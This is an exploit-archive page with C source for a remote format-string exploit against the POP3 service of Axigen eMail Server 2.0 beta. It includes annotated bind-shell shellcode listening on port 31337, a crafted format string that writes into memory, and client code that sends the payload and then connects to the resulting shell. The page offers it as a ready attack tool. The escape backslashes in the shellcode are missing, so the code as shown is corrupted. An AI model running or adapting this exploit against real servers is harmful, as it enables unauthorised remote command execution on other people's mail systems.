[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit
# Published : 2007-02-18
# Author : fuGich
# Previous Title : IPSwitch WS-FTP 5.05 (XMD5) Remote Buffer Overflow Exploit (meta)
# Next Title : MailEnable Enterprise <= 2.32 - 2.34 Remote Buffer Overflow Exploit
/* axiagen.c
*
* Axigen eMail Server v2.0 (beta)
* by fuGich Tue Dec 5 2006
*
* thanks to mu-b
*
* - Tested on: Axigen V2 (beta)
*
* logType for the pop3 service must be "system" and
* the logLevel set to any number with 4th bit set
*
* remote shell format string vulnerability in pop3
* /bin/sh to bind to port 31337
*
* optimised format string generated with libforSC
* used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
char formatString[] =
// plt fixup code
"xbaxd8xbex85x09" // mov $0x985bed8,%edx
"xc7x02x9axf0x04x08" // movl $0x804f09a,(%edx)
"x8dx52x04" // lea 0x4(%edx),%edx
"xc6x02xaa" // movb $0xaa,(%edx)
"x90x90x90" // make divisible by 8
//
// bind shell with fork to port 31337 98 bytes
//
"x6ax66" // push $0x66
"x58" // pop %eax
"x99" // cltd
"x6ax01" // push $0x1
"x5b" // pop %ebx
"x52" // push %edx
"x53" // push %ebx
"x6ax02" // push $0x2
//
// <_doint>:
//
"x89xe1" // mov %esp,%ecx
"xcdx80" // int $0x80
"x5b" // pop %ebx
"x5d" // pop %ebp
"x52" // push %edx
"x66xbdx69x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
"x0fxcd" // bswap %ebp
"x09xdd" // or %ebx,%ebp
"x55" // push %ebp
"x6ax10" // push $0x10
"x51" // push %ecx
"x50" // push %eax
"x89xe1" // mov %esp,%ecx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"xb3x04" // mov $0x4,%bl
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
//
// <_acceptloop>:
//
"x5f" // pop %edi
"x50" // push %eax
"x50" // push %eax
"x57" // push %edi
"x89xe1" // mov %esp,%ecx
"x43" // inc %ebx
"xb0x66" // mov $0x66,%al
"xcdx80" // int $0x80
"x93" // xchg %eax,%ebx
"xb0x02" // mov $0x2,%al
"xcdx80" // int $0x80
"x85xc0" // test %eax,%eax
"x75x1a" // jne <_parent>
"x59" // pop %ecx
//
// <_dup2loop>:
//
"xb0x3f" // mov $0x3f,%al
"xcdx80" // int $0x80
"x49" // dec %ecx
"x79xf9" // jns <_dup2loop>
"xb0x0b" // mov $0xb,%al
"x68x2fx2fx73x68" // push $0x68732f2f
"x68x2fx62x69x6e" // push $0x6e69622f
"x89xe3" // mov %esp,%ebx
"x52" // push %edx
"x53" // push %ebx
"xebxb2" // jmp <_doint>
//
// <_parent>:
//
"x6ax06" // push $0x6
"x58" // pop %eax
"xcdx80" // int $0x80
"xb3x04" // mov $0x4,%bl
"xebxc9" // jmp <_acceptloop>
//
// 9 write addresses
//
"xd8xbex85x09" // pointer @ 0x0985bed8
"xd9xbex85x09"
"xdaxbex85x09"
"xdbxbex85x09"
"xe0xbex85x09" // place shell code @ 0x0985bee0
"xe1xbex85x09"
"xe2xbex85x09"
"xe3xbex85x09"
"xe4xbex85x09"
// add the format string
"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhnrn";
static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);
void shell (int sock){ /* Attach to Remote Shell */
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("n - Connection closed by local usern");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("n - Connection closed by remote host.n");
exit (EXIT_FAILURE);
} else if (l < 0) {
printf ("n - Read failuren");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int sockami (u_char * host, int port){ /* create the socket */
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL){
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void formatme (u_char * host){ /* do the evil */
int sock;
printf ("+Connecting to %s:%d ", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
printf ("n+Sending format stringn");
sock_send (sock, formatString, strlen (formatString));
fflush (stdout);
sleep(2);
printf ("+Connecting to Shell ");
sock = sockami (host, 31337);
printf ("- Donen");
shell(sock);
}
int main (int argc, char **argv){ /* go figure */
printf ("Axigen 2.0 beta Remote pop3 exploitn"
"by: <fuGich@gmail.com>nn");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>nn", argv[0]);
exit (EXIT_SUCCESS);
}
formatme (argv[1]);
}
// www.Syue.com [2007-02-18]